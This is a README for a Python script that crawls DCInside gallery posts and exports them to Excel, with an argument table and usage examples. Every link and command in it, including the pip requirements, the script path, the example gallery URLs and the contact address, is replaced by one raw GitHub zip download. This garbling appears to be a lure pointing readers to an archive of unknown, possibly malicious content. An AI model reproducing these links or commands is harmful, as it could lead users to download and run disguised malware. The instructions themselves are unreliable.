A flexible Python script to crawl posts from DCInside galleries and save the data to an Excel file.
- Crawl Any Gallery: Works with regular, minor (`mgallery`), and mini (`mini`) galleries.
- Page Range Selection: Specify exactly which pages you want to crawl (e.g., pages 1 through 5).
- Keyword Filtering: Filter posts by a specific keyword in the title.
- Data Cleaning: Automatically removes advertisements and other non-post entries to ensure clean data.
- Excel Export: Saves the extracted data (Number, Title, Author, Views, Link, Liked) into a clean `.xlsx` file named after the gallery ID.
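
The keyword filtering and data cleaning features can be pictured with a minimal sketch. This is not the script's actual code: the function name `clean_and_filter` is hypothetical, the dictionary keys simply reuse the exported column names, and the rule that a genuine post has a purely numeric post number is an assumption made for illustration.

```python
def clean_and_filter(rows, keyword=None):
    """Keep real posts only, optionally restricted to titles containing keyword."""
    kept = []
    for row in rows:
        # Assumption: genuine posts carry a purely numeric post number,
        # while ads and other non-post entries carry a label or nothing.
        if not str(row.get("Number", "")).strip().isdigit():
            continue
        # Keyword filtering: plain substring match on the title.
        if keyword and keyword not in row.get("Title", ""):
            continue
        kept.append(row)
    return kept


# Made-up sample rows, for illustration only.
rows = [
    {"Number": "AD", "Title": "Sponsored"},
    {"Number": "101", "Title": "녹화 방법 질문"},
    {"Number": "102", "Title": "잡담"},
]
print(clean_and_filter(rows, keyword="녹화"))
```

Calling the function without a keyword keeps every row that passes the cleaning step.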
- Python 3.x
- The libraries listed in https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip.
- Clone the repository or download the files.
- Install the required packages using pip:

      pip install -r https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip

The script is run from the command line with arguments specifying the target gallery and pages.

    python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l <URL> -p <PAGE_RANGE> [OPTIONS]

| Argument | Short Form | Description | Required |
|---|---|---|---|
| `--link` | `-l` | The full URL of the gallery board list. | Yes |
| `--pages` | `-p` | The range of pages to crawl (e.g., "1-5"). Defaults to "1-100" if not provided. | No |
| `--search-word` | `-S` | An optional keyword to filter posts by their title. | No |
| `--liked-number` | `-L` | Filter posts by an exact number of likes. | No |
| `--liked-number-over` | | Filter posts by a number of likes greater than the specified value. | No |
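
The argument table maps naturally onto Python's standard `argparse` module. The sketch below is an illustration under stated assumptions, not the script's own parser: the flags and the "1-100" default come from the table, while the function names `build_parser` and `parse_page_range`, the integer types for the like filters, the acceptance of a single page such as "3", and the `example.com` URL are all hypothetical.

```python
import argparse


def build_parser():
    """Build a parser mirroring the documented command-line arguments."""
    parser = argparse.ArgumentParser(description="Illustrative argument parser.")
    parser.add_argument("-l", "--link", required=True,
                        help="Full URL of the gallery board list.")
    parser.add_argument("-p", "--pages", default="1-100",
                        help='Page range to crawl, e.g. "1-5".')
    parser.add_argument("-S", "--search-word", default=None,
                        help="Keyword that post titles must contain.")
    parser.add_argument("-L", "--liked-number", type=int, default=None,
                        help="Keep posts with exactly this many likes.")
    parser.add_argument("--liked-number-over", type=int, default=None,
                        help="Keep posts with more likes than this value.")
    return parser


def parse_page_range(text):
    """Turn "1-5" into (1, 5); a bare "3" is treated as (3, 3) (assumption)."""
    start_text, _, end_text = text.partition("-")
    start = int(start_text)
    end = int(end_text) if end_text else start
    if start < 1 or end < start:
        raise ValueError(f"invalid page range: {text!r}")
    return start, end


# Placeholder URL, for illustration only.
args = build_parser().parse_args(["-l", "https://example.com/board/lists/?id=demo", "-p", "1-3"])
print(args.link, parse_page_range(args.pages))
```

Validating the range before crawling lets a mistyped value such as "5-1" fail immediately rather than after requests have been sent.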
- Basic Crawling: To crawl pages 1 through 3 of the 'record' minor gallery:

      python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -p 1-3

- Crawling with a Search Filter: To crawl the first 10 pages of the 'record' gallery and only save posts with the word "녹화" in the title:

      python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -p 1-10 -S "녹화"

- Crawling with Liked Number Filter (Exact): To crawl the first 5 pages and only get posts with exactly 10 likes:

      python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -p 1-5 -L 10

- Crawling with Liked Number Filter (Over): To crawl the first 5 pages and only get posts with more than 5 likes:

      python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -p 1-5 --liked-number-over 5

- Crawling without Page Range (Defaults to 1-100): To crawl the first 100 pages of the 'record' gallery:

      python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip

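
The difference between the exact and the "over" like filters used in the examples above can be shown with a small sketch. The function name `matches_like_filter` and the sample posts are hypothetical, and how the script behaves when both filters are given at once is not documented; here both conditions must hold, which is an assumption.

```python
def matches_like_filter(liked, exact=None, over=None):
    """Return True if a like count passes the requested filters."""
    # Exact filter: the count must equal the given value.
    if exact is not None and liked != exact:
        return False
    # Over filter: the count must be strictly greater than the given value.
    if over is not None and liked <= over:
        return False
    return True


# Made-up sample posts, for illustration only.
posts = [
    {"Title": "a", "Liked": 10},
    {"Title": "b", "Liked": 5},
    {"Title": "c", "Liked": 6},
]
exactly_ten = [p for p in posts if matches_like_filter(p["Liked"], exact=10)]
more_than_five = [p for p in posts if matches_like_filter(p["Liked"], over=5)]
print([p["Title"] for p in exactly_ten])     # ['a']
print([p["Title"] for p in more_than_five])  # ['a', 'c']
```

Note that a post with exactly 5 likes is excluded by `over=5`, matching the "more than 5 likes" wording.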
This project is licensed under the MIT License.
This tool is intended for educational purposes only. Please ensure that you have the right to crawl the target website and that you are not violating any terms of service. The user of this script is solely responsible for any legal consequences that may arise from its use.
For any questions or feedback, please contact https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip.